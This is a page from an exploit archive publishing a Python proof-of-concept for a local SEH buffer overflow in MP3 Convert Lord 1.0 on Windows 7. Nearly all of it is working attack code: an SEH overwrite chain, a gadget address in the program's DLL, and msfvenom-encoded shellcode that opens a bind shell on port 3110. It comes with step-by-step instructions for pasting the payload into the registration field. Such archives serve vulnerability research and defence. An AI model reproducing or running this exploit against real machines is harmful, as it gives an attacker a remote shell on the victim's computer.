Share
## https://sploitus.com/exploit?id=1337DAY-ID-38156
# Exploit Title: MP3 Convert Lord V1.0 Local Seh Exploit
# Date: 06.01.2023
# Vendor Homepage: http://www.avlord.com/
# Software Link:   https://www.softpedia.com/dyn-postdownload.php/baa965c6b5d22d62987a4638f33d5ec1/63b86eb2/3ecb/4/2
# Exploit Author: Achilles
# Tested Version: 1.0
# Tested on: Windows 7 x64

# 1.- Run python code : MP3 Convert Lord.py
# 2.- Open EVIL.txt and copy content to Clipboard
# 3.- Open MP3 Convert Lord and press HELP and REGISTRATION
# 4.- Paste the Content of EVIL.txt into the 'Username and Registrationcode Field'
# 5.- Click 'OK' and you will have a bind shell port 3110.

#!/usr/bin/env python

import struct

buffer = "\x41" * 572
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh  =  struct.pack('<L',0x10016e37) #DLL_LORDM.dll
nops =  "\x90" * 20

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode = ("\xb8\x42\xb3\x74\xbc\xdb\xde\xd9\x74\x24\xf4\x5a\x2b"
"\xc9\xb1\x53\x31\x42\x12\x03\x42\x12\x83\xa8\x4f\x96"
"\x49\xd0\x58\xd5\xb2\x28\x99\xba\x3b\xcd\xa8\xfa\x58"
"\x86\x9b\xca\x2b\xca\x17\xa0\x7e\xfe\xac\xc4\x56\xf1"
"\x05\x62\x81\x3c\x95\xdf\xf1\x5f\x15\x22\x26\xbf\x24"
"\xed\x3b\xbe\x61\x10\xb1\x92\x3a\x5e\x64\x02\x4e\x2a"
"\xb5\xa9\x1c\xba\xbd\x4e\xd4\xbd\xec\xc1\x6e\xe4\x2e"
"\xe0\xa3\x9c\x66\xfa\xa0\x99\x31\x71\x12\x55\xc0\x53"
"\x6a\x96\x6f\x9a\x42\x65\x71\xdb\x65\x96\x04\x15\x96"
"\x2b\x1f\xe2\xe4\xf7\xaa\xf0\x4f\x73\x0c\xdc\x6e\x50"
"\xcb\x97\x7d\x1d\x9f\xff\x61\xa0\x4c\x74\x9d\x29\x73"
"\x5a\x17\x69\x50\x7e\x73\x29\xf9\x27\xd9\x9c\x06\x37"
"\x82\x41\xa3\x3c\x2f\x95\xde\x1f\x38\x5a\xd3\x9f\xb8"
"\xf4\x64\xec\x8a\x5b\xdf\x7a\xa7\x14\xf9\x7d\xc8\x0e"
"\xbd\x11\x37\xb1\xbe\x38\xfc\xe5\xee\x52\xd5\x85\x64"
"\xa2\xda\x53\x10\xaa\x7d\x0c\x07\x57\x3d\xfc\x87\xf7"
"\xd6\x16\x08\x28\xc6\x18\xc2\x41\x6f\xe5\xed\x61\x56"
"\x60\x0b\x13\x86\x24\x83\x8b\x64\x13\x1c\x2c\x96\x71"
"\x34\xda\xdf\x93\x83\xe5\xdf\xb1\xa3\x71\x54\xd6\x77"
"\x60\x6b\xf3\xdf\xf5\xfc\x89\xb1\xb4\x9d\x8e\x9b\x2e"
"\x3d\x1c\x40\xae\x48\x3d\xdf\xf9\x1d\xf3\x16\x6f\xb0"
"\xaa\x80\x8d\x49\x2a\xea\x15\x96\x8f\xf5\x94\x5b\xab"
"\xd1\x86\xa5\x34\x5e\xf2\x79\x63\x08\xac\x3f\xdd\xfa"
"\x06\x96\xb2\x54\xce\x6f\xf9\x66\x88\x6f\xd4\x10\x74"
"\xc1\x81\x64\x8b\xee\x45\x61\xf4\x12\xf6\x8e\x2f\x97"
"\x06\xc5\x6d\xbe\x8e\x80\xe4\x82\xd2\x32\xd3\xc1\xea"
"\xb0\xd1\xb9\x08\xa8\x90\xbc\x55\x6e\x49\xcd\xc6\x1b"
"\x6d\x62\xe6\x09")
pad ="B" * (8000 - len(buffer) - len(nseh+seh) - len(nops) -len(shellcode))
payload = buffer + nseh + seh + nops + shellcode + pad

try:
	f=open("Evil.txt","w")
	print "[+] Creating %s bytes evil payload.." %len(payload)
	f.write(payload)
	f.close()
	print "[+] File created!"
except:
	print "File cannot be created"